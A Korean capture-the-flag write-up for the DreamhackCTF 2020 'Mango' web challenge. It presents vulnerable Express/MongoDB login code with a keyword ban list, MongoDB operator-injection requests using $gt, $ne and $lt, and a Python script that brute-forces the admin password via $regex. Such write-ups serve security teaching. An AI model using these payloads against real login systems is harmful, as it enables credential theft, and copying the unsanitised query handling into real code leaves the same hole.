[DreamhackCTF 2020] Mango write up
web 분야의 Mango 문제이다.
해당 문제는 코드가 주워줬고, `mongodb injection` 으로 admin 의 pw를 알아내는 문제이다.
const express = require('express');
const app = express();
const mongoose = require('mongoose');
mongoose.connect('mongodb://localhost/main', { useNewUrlParser: true, useUnifiedTopology: true });
const db = mongoose.connection;
// flag is in db, {'uid': 'admin', 'upw': 'DH{32alphanumeric}'}
const BAN = ['admin', 'dh', 'admi'];
filter = function(data){
const dump = JSON.stringify(data).toLowerCase();
var flag = false;
BAN.forEach(function(word){
if(dump.indexOf(word)!=-1) flag = true;
});
return flag;
}
app.get('/login', function(req, res) {
if(filter(req.query)){
res.send('filter');
return;
}
const {uid, upw} = req.query;
db.collection('user').findOne({
'uid': uid,
'upw': upw,
}, function(err, result){
if (err){
res.send('err');
}else if(result){
res.send(result['uid']);
}else{
res.send('undefined');
}
})
});
app.get('/', function(req, res) {
res.send('/login?uid=guest&upw=guest');
});
app.listen(8000, '0.0.0.0');
위 코드에서 중요한 부분만 보면 아래와 같다.
`filter()` 함수로 특정 문자열을 필터링 하는 것을 볼 수 있다.
// flag is in db, {'uid': 'admin', 'upw': 'DH{32alphanumeric}'}
const BAN = ['admin', 'dh', 'admi'];
app.get('/login', function(req, res) {
if(filter(req.query)){
res.send('filter');
return;
}
const {uid, upw} = req.query;
db.collection('user').findOne({
'uid': uid,
'upw': upw,
},
...
`mongodb injection` 기법중에서 `$ne` `$gt` `$lt` 등등 을 이용해 query를 조작할 수 있다.
예를들어 사진 결과를 보면 admin의 pw를 몰라도 result에 결과가 출력되는 것을 볼 수있다.
이 같은 원리로 문제 페이지에 요청을 보내보자.
아래와 같이 요청을 보내면 `guest` 가 출력이 된다.
/login?uid[$gt]=adm&upw[$ne]=
// result: guest
`guest` 빼고 다른 결과를 보기 위해 `$ne`를 이용하여 결과 값에서 `guest`를 제외시킨다.
이번에는 `dreamhack` 이 출력된다.
/login?uid[$gt]=adm&uid[$ne]=guest&upw[$ne]=
// result: dreamhack
이번에는 `$lt` 를 이용하여 `d` 라는 문자 보다 작은 값을 출력하게끔 만든다.
그럼 `dreamhack` < `d` 는 `false` 이므로 `dreamhack` 이 출력 되지 않는다.
결과를 보면 성공적으로 `admin` 이 출력된다.
/login?uid[$gt]=adm&uid[$ne]=guest&uid[$lt]=d&upw[$ne]=
// result: admin
문제는 admin의 pw를 알아내야 한다. 위에서 했던 방식으로 `upw[$lt]=DH...` 이런 식으로 찾아 보려고 했지만 `filter()` 함수에서 걸리게 된다. 다른 방법으론 `$regex` 를 사용하는 것이다.
아래 사진의 결과를 보면 DH로 시작하지 않아도 `$regex` 로 정규 표현식 비슷하게 찾을 수 있게 된다.
따라서 payload는 다음과 같다.
import requests
import string
url = "http://host3.dreamhack.games:15346/login"
s = string.digits + string.ascii_uppercase + string.ascii_lowercase + "{}"
result = ""
for i in range(32):
for idx, c in enumerate(s):
payload = "?uid[$gt]=adm&uid[$ne]=guest&uid[$lt]=d&upw[$regex]={" + (result+c)
print(payload)
res = requests.get(url+payload)
if res.text.find("admin") != -1:
result += s[idx]
print(result)
break
flag = "DH" + result + "}"
print(flag)